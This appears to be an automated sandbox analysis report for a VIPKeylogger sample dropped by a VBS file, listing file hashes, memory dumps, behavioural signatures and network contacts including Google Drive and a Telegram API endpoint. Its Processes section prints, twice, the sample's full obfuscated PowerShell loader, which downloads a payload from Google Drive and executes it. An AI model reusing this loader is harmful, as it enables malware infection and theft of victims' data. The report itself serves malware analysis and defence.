memory/2884-0-0x00007FF8DB353000-0x00007FF8DB355000-memory.dmp
memory/2884-1-0x0000023366250000-0x0000023366272000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whllnpm4.hmz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2884-11-0x00007FF8DB350000-0x00007FF8DBE11000-memory.dmp
memory/2884-12-0x00007FF8DB350000-0x00007FF8DBE11000-memory.dmp
memory/2884-15-0x00007FF8DB350000-0x00007FF8DBE11000-memory.dmp
memory/2884-18-0x00007FF8DB350000-0x00007FF8DBE11000-memory.dmp
memory/392-19-0x00000000021D0000-0x0000000002206000-memory.dmp
memory/392-20-0x0000000004CB0000-0x00000000052D8000-memory.dmp
memory/392-21-0x0000000004BE0000-0x0000000004C02000-memory.dmp
memory/392-22-0x00000000052E0000-0x0000000005346000-memory.dmp
memory/392-23-0x0000000005350000-0x00000000053B6000-memory.dmp
memory/392-33-0x0000000005480000-0x00000000057D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 806286a9ea8981d782ba5872780e6a4c |
| SHA1 | 99fe6f0c1098145a7b60fda68af7e10880f145da |
| SHA256 | cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713 |
| SHA512 | 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e |
memory/392-35-0x0000000005AB0000-0x0000000005ACE000-memory.dmp
memory/392-36-0x0000000005AF0000-0x0000000005B3C000-memory.dmp
memory/392-37-0x0000000007300000-0x000000000797A000-memory.dmp
memory/392-38-0x0000000006060000-0x000000000607A000-memory.dmp
memory/392-39-0x0000000006D20000-0x0000000006DB6000-memory.dmp
memory/392-40-0x0000000006CC0000-0x0000000006CE2000-memory.dmp
memory/392-41-0x0000000007F30000-0x00000000084D4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo
| MD5 | 15d4bf8d1435c92eafc43ebdff22b873 |
| SHA1 | 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a |
| SHA256 | ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce |
| SHA512 | 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c |
memory/392-43-0x00000000084E0000-0x000000000DCA8000-memory.dmp
memory/4184-56-0x0000000001200000-0x0000000002454000-memory.dmp
memory/4184-58-0x0000000001200000-0x0000000001248000-memory.dmp
memory/4184-57-0x0000000001200000-0x0000000002454000-memory.dmp
memory/4184-59-0x0000000025B50000-0x0000000025BEC000-memory.dmp
memory/4184-61-0x00000000266B0000-0x0000000026872000-memory.dmp
memory/4184-62-0x0000000025F60000-0x0000000025FB0000-memory.dmp
memory/4184-64-0x0000000026880000-0x0000000026912000-memory.dmp
memory/4184-65-0x0000000026040000-0x000000002604A000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-22 16:32
Reported
2024-10-22 16:38
Platform
win7-20241010-en
Max time kernel
122s
Max time network
178s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
memory/2884-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/2884-5-0x000000001B3F0000-0x000000001B6D2000-memory.dmp
memory/2884-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2884-7-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-8-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-9-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-10-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-11-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-13-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2884-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2884-16-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\POUVG0AM6I18VFV204OS.temp
| MD5 | 032aaf6805a5d3992b2c5e97cf0c2016 |
| SHA1 | ab45d2ab666805190929d6319606dfdf276e2469 |
| SHA256 | 979e3b251c22b73ad7779ce4fe1da8ed08188f2ea7477ed0dab8048d5ce0588d |
| SHA512 | 88f70b036a7ea55772ff4d01b36b6d592117d94461873c5d66f38b26c28a0a2cabc2099731da57da36cf37935ece9ee77249148d4003829edc4d93d7acb22c7c |
C:\Users\Admin\AppData\Roaming\Realiaernes60.Svo
| MD5 | 15d4bf8d1435c92eafc43ebdff22b873 |
| SHA1 | 18a5e9c68c654584e41ddda35c8c1a7e8ea2e13a |
| SHA256 | ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce |
| SHA512 | 463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c |
memory/2852-20-0x0000000006180000-0x000000000B948000-memory.dmp
memory/2272-41-0x0000000000330000-0x0000000001392000-memory.dmp
memory/2272-42-0x0000000000330000-0x0000000001392000-memory.dmp
memory/2272-43-0x0000000000330000-0x0000000000378000-memory.dmp